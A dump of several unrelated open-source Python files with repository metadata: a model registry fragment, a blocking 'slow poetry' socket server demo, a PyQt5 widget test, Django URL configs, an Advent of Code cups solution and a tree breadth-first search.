"lr": LinearRegression,
"mlp": MLPClassifier,
"dtree": DecisionTreeClassifier,
},
}
class Model:
def __init__(self, name, mode, **kwargs):
if name not in valid_models[mode].keys():
raise NotImplementedError(
f"This model is not supported at the moment. Models supported are: {list(valid_models[mode].keys())}"
)
self.name = name
self.mode = mode
self.model = valid_models[mode][name](**kwargs)
if self.model == "dataset":
return
self.predict = self.model.predict
if self.model.fit:
self.train = self.model.fit
| [
"sujay@abacus.ai"
] | sujay@abacus.ai |
54bfcb090bd4baa24613099536b292275b29c316 | eab36f5adb15ba24acb51ace389959fa9592346f | /demos/slow_pemos.py | c99f41c5affde99287e931a8af691c950fb15f62 | [] | no_license | yance-dev/twdemo | ebda30c32dae3e722e740b71fe5623a6f47ff70f | e331f5a1c13df1d9e5bc2bba8a9a50dfd9b6b2ba | refs/heads/master | 2022-02-07T10:29:28.804627 | 2019-06-14T16:57:39 | 2019-06-14T16:57:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,795 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author : Young
@Email : hyc554@outlook.com
@site : http://www.cnblogs.com/huang-yc/
@File : slow_pemos.py
@version : 1.0
@Time : 2019/6/14 0:28
Description about this file:
"""
# This is the blocking version of the Slow Poetry Server.
import optparse, os, socket, time
def parse_args():
usage = """usage: %prog [options] poetry-file
This is the Slow Poetry Server, blocking edition.
Run it like this:
python slowpoetry.py <path-to-poetry-file>
If you are in the base directory of the twisted-intro package,
you could run it like this:
python blocking-server/slowpoetry.py poetry/ecstasy.txt
to serve up John Donne's Ecstasy, which I know you want to do.
"""
parser = optparse.OptionParser(usage)
help = "The port to listen on. Default to a random available port."
parser.add_option('--port', type='int', help=help)
help = "The interface to listen on. Default is localhost."
parser.add_option('--iface', help=help, default='localhost')
help = "The number of seconds between sending bytes."
parser.add_option('--delay', type='float', help=help, default=.7)
help = "The number of bytes to send at a time."
parser.add_option('--num-bytes', type='int', help=help, default=10)
options, args = parser.parse_args()
if len(args) != 1:
parser.error('Provide exactly one poetry file.')
poetry_file = args[0]
if not os.path.exists(args[0]):
parser.error('No such file: %s' % poetry_file)
return options, poetry_file
def send_poetry(sock, poetry_file, num_bytes, delay):
"""Send some poetry slowly down the socket."""
inputf = open(poetry_file)
while True:
bytes = inputf.read(num_bytes)
if not bytes: # no more poetry :(
sock.close()
inputf.close()
return
print('Sending %d bytes' % len(bytes))
try:
sock.sendall(bytes) # this is a blocking call
except socket.error:
sock.close()
inputf.close()
return
time.sleep(delay)
def serve(listen_socket, poetry_file, num_bytes, delay):
while True:
sock, addr = listen_socket.accept()
print('Somebody at %s wants poetry!' % (addr,))
send_poetry(sock, poetry_file, num_bytes, delay)
def main():
options, poetry_file = parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((options.iface, options.port or 0))
sock.listen(5)
print('Serving %s on port %s.' % (poetry_file, sock.getsockname()[1]))
serve(sock, poetry_file, options.num_bytes, options.delay)
if __name__ == '__main__':
main()
| [
"1415940604@qq.com"
] | 1415940604@qq.com |
3d9072edf03e4acc4fe1f25213806717135148c8 | 985016ed7587f38f6c43a37f515c60aa65ecf2b7 | /stackGuiTest.py | b0ff2d2b7b1cdc9d191c5736e6d4f1519a834498 | [] | no_license | MichaelD7/hydraulics | 101274f5139dca638a264707fd43cebc08e1bfc0 | 31575fb9ac15dffea0d85cf6d7fd7cd8c7204c17 | refs/heads/master | 2023-08-30T21:23:09.348671 | 2023-08-07T18:06:25 | 2023-08-07T18:06:25 | 112,238,099 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,576 | py | import sys
from PyQt5.QtWidgets import (QWidget, QLabel, QHBoxLayout, QApplication,
QLineEdit, QStackedWidget, QComboBox)
class Application(QWidget):
def __init__(self):
super().__init__()
self.myCombo = QComboBox()
self.myCombo.addItem("circle")
self.myCombo.addItem("square")
self.myCombo.addItem("trapezoid")
self.stack1 = QWidget()
self.stack2 = QWidget()
self.stack3 = QWidget()
self.stack1UI()
self.stack2UI()
self.stack3UI()
self.stack = QStackedWidget(self)
self.stack.addWidget(self.stack1)
self.stack.addWidget(self.stack2)
self.stack.addWidget(self.stack3)
layout = QHBoxLayout(self)
layout.addWidget(self.myCombo)
layout.addWidget(self.stack)
self.setLayout(layout)
self.myCombo.currentIndexChanged.connect(self.stack.setCurrentIndex)
self.show()
def stack1UI(self):
layout = QHBoxLayout()
layout.addWidget(QLabel("circle"))
layout.addWidget(QLineEdit())
self.stack1.setLayout(layout)
def stack2UI(self):
layout = QHBoxLayout()
layout.addWidget(QLabel("square"))
layout.addWidget(QLineEdit())
self.stack2.setLayout(layout)
def stack3UI(self):
layout = QHBoxLayout()
layout.addWidget(QLabel("trapezoid"))
layout.addWidget(QLineEdit())
self.stack3.setLayout(layout)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Application()
sys.exit(app.exec_())
| [
"mdevenish@Unknown-3c-15-c2-e8-1e-c6.home"
] | mdevenish@Unknown-3c-15-c2-e8-1e-c6.home |
deacbd1826fa9af6bb62b41abd639031a0564244 | ab14e4a26a86e0395233c0408653753dbe4b3ddb | /carshop/urls.py | 0daee275a28b15f4e578f00fbf6d148b4ebb36aa | [] | no_license | berzezek/LCMotorkorea | fda0f46c3fd281a229ddfdd34e9c6721019585b5 | b941b50fb2631aa13861cd03b10fa229045f899b | refs/heads/main | 2023-08-20T00:57:10.851716 | 2021-10-20T11:55:16 | 2021-10-20T11:55:16 | 419,308,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from django.apps import apps
from django.urls import include, path
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('i18n/', include('django.conf.urls.i18n')),
# The Django admin is not officially supported; expect breakage.
# Nonetheless, it's often useful for debugging.
path('admin/', admin.site.urls),
path('', include(apps.get_app_config('oscar').urls[0])),
path('carshop/', include('blog.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.STATIC_ROOT) | [
"wknduz@gmail.com"
] | wknduz@gmail.com |
2f9ed8f88eaed4cef0b27b28ffe5d938f18705d8 | 1ff422ebe22dffad5dd2324c5629891a377cf070 | /Tree_Algorithms/Breadth_First_Search.py | c9bb6f99c7d54536d62fa16333e29a6d1f458b1b | [] | no_license | duxuan1/Algorithms | 4db23327df444479fb7275bf0b1175a4b33fa5c4 | 73e2c42e0f697ea15e189df083fa8b7c630856fc | refs/heads/master | 2023-04-22T02:57:02.171482 | 2021-04-23T13:33:40 | 2021-04-23T13:33:40 | 278,236,896 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | from typing import List
from Binary_Tree_ADT import *
def bfs(root: TreeNode) -> List[int]:
if not root:
return []
tree, queue = [], [root]
while queue:
node = queue.pop(0)
tree.append(node.val)
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
return tree
def make_tree() -> TreeNode:
"""
Return a random list of n ints.
"""
l2_1 = TreeNode(4)
l2_2 = TreeNode(5)
l2_3 = TreeNode(6)
l2_4 = TreeNode(7)
l1_1 = TreeNode(2)
l1_1.left = l2_1
l1_1.right = l2_2
l1_2 = TreeNode(3)
l1_2.left = l2_3
l1_2.right = l2_4
l0 = TreeNode(1)
l0.left = l1_1
l0.right = l1_2
return l0
if __name__ == '__main__':
root = make_tree()
result = bfs(root)
assert result == [1, 2, 3, 4, 5, 6, 7]
| [
"duxuan@moris-MacBook-Pro.local"
] | duxuan@moris-MacBook-Pro.local |
14de914eafa10449b77e6e446ba593c4617271a1 | 12d007b50d20030c4a0d8ecceaeb532b3de4f966 | /setup.py | 1ccbc3c4e37c98f182e6b3eedb9ea81800bdaf3a | [
"MIT"
] | permissive | Tygs/ayo | 8be03cf1854d122b763272ba256e3fa87135e776 | 27b2225770581e19f3abdb8db0721776f0cfb195 | refs/heads/master | 2021-11-08T02:09:37.979755 | 2021-11-01T10:44:35 | 2021-11-01T10:44:35 | 136,607,852 | 32 | 2 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | """
Install: python setup.py install
Dev mode: python setup.py develop
Test: pip install pytest && pytest tests
All the config is in setup.cfg
"""
import setuptools
setuptools.setup()
| [
"lesametlemax@gmail.com"
] | lesametlemax@gmail.com |
1630a177235531d37be13c21a34a1295f329121c | 74c9ed9dd153d8de3fa92f0b50def446fdaae941 | /GeoLocation/measurements/forms.py | 365eb473c8a81925c746c1dec5a6de7f641f7087 | [] | no_license | riyadh9292/Geolocator | d5fa43fba53a1d3b7905ae367e802b8482f16abd | 57467a623bd3b86aca9dffc300c2771fdd560919 | refs/heads/main | 2023-04-07T23:29:53.368318 | 2021-04-17T11:33:53 | 2021-04-17T11:33:53 | 358,861,759 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | from django import forms
from .models import Measurement
class MeasurementModelForm(forms.ModelForm):
class Meta:
model=Measurement
fields=('destination',)
| [
"mrriyadh66@gmail.com"
] | mrriyadh66@gmail.com |
4679a7de5f74b6b814a0779e2dea65db07e1130f | 2283023a328151e0b63cd32bba2354561b28280a | /library/urls.py | 3df1da8213b316e4c3a2d3894c67bf7e639d9217 | [] | no_license | xsypck/library | 1111d4919daa8d4e027c871a590db69ef2cb828c | b47727cfa6809462583ff50f2d8488686d707d17 | refs/heads/main | 2023-04-15T22:27:19.718813 | 2021-05-03T01:43:26 | 2021-05-03T01:43:26 | 363,660,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,105 | py | """library URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from login import views
#在浏览器输入路径,找到这里,指向view中的函数
urlpatterns = [
path('admin/', admin.site.urls),
path('login/',views.index),#path(route, view, kwargs=None, name=None)
path('calpage/',views.calpage),#不是调用函数,只是指给它
path('cal',views.cal),
path('list',views.callist),
path('clean',views.clean),
path('home/',views.home)
]
| [
"838816528"
] | 838816528 |
20b54568767dfde2e2e6ceae5e419b216c77a75a | f26e6c9fc3d9311067eb12bb8d50cecc610831bc | /day23/cups.py | 36d0de2e2dff1c362942480ae068319acfcc2b35 | [] | no_license | drewhayward/advent-of-code-2020 | 9a8bc79d7f76460f6fafb4b50032a267515657f3 | a5f5a6b6306a8dc65434038ae2b72ffd0cb8ee74 | refs/heads/master | 2023-02-06T12:53:48.628880 | 2020-12-26T03:06:21 | 2020-12-26T03:06:21 | 324,471,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,611 | py | from tqdm import trange
class Node:
def __init__(self, value):
self.next = None
self.prev = None
self.value = value
class CircularLinkedList:
def __init__(self, items):
self.node_map = {}
self.current_node = Node(items[0])
self.node_map[self.current_node.value] = self.current_node
self.max_value = max(items)
past = self.current_node
for item in items[1:]:
node = Node(item)
self.node_map[item] = node
past.next = node
node.prev = past
past = node
past.next = self.current_node
self.current_node.prev = past
def __str__(self):
s = ''
s += f'({str(self.current_node.value)})'
pos = self.current_node.next
while pos != self.current_node:
s += f' {pos.value}'
pos = pos.next
return s
def find(self, value):
return self.node_map[value]
def move(self):
# Trim the group out
group_start = self.current_node.next
group_start.prev = None
group_end = group_start.next.next
group = [group_start, group_start.next, group_start.next.next]
self.current_node.next = group_end.next
group_end.next.prev = self.current_node
group_end.next = None
# Look for the target
target_value = ((self.current_node.value - 2) % self.max_value) + 1
target = self.find(target_value)
while target in group:
target_value = ((target_value - 2) % self.max_value) + 1
target = self.find(target_value)
# Splice in the group
target_end = target.next
group_start.prev = target
target.next = group_start
group_end.next = target_end
target_end.prev = group_end
self.current_node = self.current_node.next
def part_1():
clist = CircularLinkedList([5, 8, 6, 4, 3, 9, 1, 7, 2])
for _ in range(100):
clist.move()
one_node = clist.find(1)
s = ''
current_node = one_node.next
while current_node != one_node:
s += str(current_node.value)
current_node = current_node.next
return s
def part_2():
#nums = [3,8,9,1,2,5,4,6,7]
nums = [5, 8, 6, 4, 3, 9, 1, 7, 2]
nums.extend(range(10, 1000001))
clist = CircularLinkedList(nums)
for _ in trange(10000000):
clist.move()
one_node = clist.node_map[1]
return one_node.next.value * one_node.next.next.value
if __name__ == "__main__":
print(part_1())
print(part_2())
| [
"d.andrew.hayward@gmail.com"
] | d.andrew.hayward@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.